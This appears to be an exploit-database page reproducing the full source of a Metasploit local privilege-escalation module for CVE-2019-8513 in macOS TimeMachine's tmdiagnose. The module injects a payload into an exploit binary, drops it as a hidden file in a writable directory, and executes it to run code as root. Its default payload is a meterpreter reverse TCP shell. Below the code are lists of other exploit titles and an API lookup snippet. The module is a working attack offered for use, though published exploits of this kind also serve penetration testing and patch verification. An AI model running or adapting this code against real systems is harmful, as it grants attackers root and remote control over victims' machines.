Menu

"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)"

Author

Metasploit

Platform

macos

Release date

2019-07-02

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
      'Description'   => %q{
          This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
        order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
        from a command injection vulnerability that can be exploited by creating a
        specially crafted disk label.

          The tmdiagnose binary uses awk to list every mounted volume, and composes
        shell commands based on the volume labels. By creating a volume label with the
        backtick character, we can have our own binary executed with root priviledges.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'CodeColorist', # Discovery and exploit
          'timwr',        # Metasploit module
      ],
      'References'     => [
          ['CVE', '2019-8513'],
          ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
          ['URL', 'https://support.apple.com/en-in/HT209600'],
          ['URL', 'https://github.com/ChiChou/sploits'],
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
      'Targets'        => [
          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
          [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
          [ 'Command payload',               { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
      ],
      'DisclosureDate' => 'Apr 13 2019'))
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def upload_executable_file(filepath, filedata)
    print_status("Uploading file: '#{filepath}'")
    write_file(filepath, filedata)
    chmod(filepath)
    register_file_for_cleanup(filepath)
  end

  def check
    version = Gem::Version.new(get_system_version)
    if version >= Gem::Version.new('10.14.4')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  def exploit
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
    if target['Arch'] == ARCH_X64
      root_cmd = payload.encoded
    else
      root_cmd = payload.raw
      if target['Arch'] == ARCH_PYTHON
        root_cmd = "echo \"#{root_cmd}\" | python"
      end
      root_cmd = "CMD:#{root_cmd}"
    end
    if root_cmd.length > 1024
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
    end

    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
    upload_executable_file(exploit_file, exploit_data)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec(exploit_file)
    print_status("Exploit result:\n#{result}")
  end
end
Release Date Title Type Platform Author
2019-08-05 "macOS iMessage - Heap Overflow when Deserializing" dos macos "Google Security Research"
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-03-01 "macOS XNU - Copy-on-Write Behavior Bypass via Mount of User-Owned Filesystem Image" dos macos "Google Security Research"
2019-02-13 "Apple macOS 10.13.5 - Local Privilege Escalation" local macos Synacktiv
2019-02-20 "FaceTime - Texture Processing Memory Corruption" dos macos "Google Security Research"
2019-01-31 "macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File" dos macos "Google Security Research"
2019-01-24 "Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)" dos macos "Saeed Hasanzadeh"
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-13 "CuteFTP Mac 3.1 - Denial of Service (PoC)" dos macos "Yair Rodríguez Aparicio"
2018-11-06 "FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption" dos macos "Google Security Research"
2018-11-06 "FaceTime - 'readSPSandGetDecoderParams' Stack Corruption" dos macos "Google Security Research"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
2018-05-30 "Yosoro 1.0.4 - Remote Code Execution" webapps macos "Carlo Pelliccioni"
2017-02-24 "Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting" webapps macos "Google Security Research"
2017-06-06 "Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution" remote macos saelo
2017-05-04 "Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free" remote macos "saelo & niklasb"
2017-02-23 "Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read" remote macos "Google Security Research"
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-03-20 "Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation" local macos "Google Security Research"
2017-01-16 "Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation" local macos "Brandon Azad"
2017-12-07 "Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak" local macos "Brandon Azad"
2017-11-28 "Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation" local macos Lemiorhan
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
Release Date Title Type Platform Author
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2019-07-29 "WP Database Backup < 5.2 - Remote Code Execution (Metasploit)" remote php Metasploit
2019-07-29 "Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)" remote unix Metasploit
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-03 "Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)" remote windows Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-05-20 "GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-04-30 "Pimcore < 5.71 - Unserialize RCE (Metasploit)" remote php Metasploit
2019-04-30 "AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)" remote windows Metasploit
2019-04-25 "RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)" local windows Metasploit
2019-04-19 "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)" remote multiple Metasploit
2019-04-19 "SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)" local linux Metasploit
2019-04-18 "LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)" local multiple Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47070/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/47070/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47070/41459/mac-os-x-timemachine-tmdiagnose-command-injection-privilege-escalation-metasploit/download/", "exploit_id": "47070", "exploit_description": "\"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)\"", "exploit_date": "2019-07-02", "exploit_author": "Metasploit", "exploit_type": "local", "exploit_platform": "macos", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse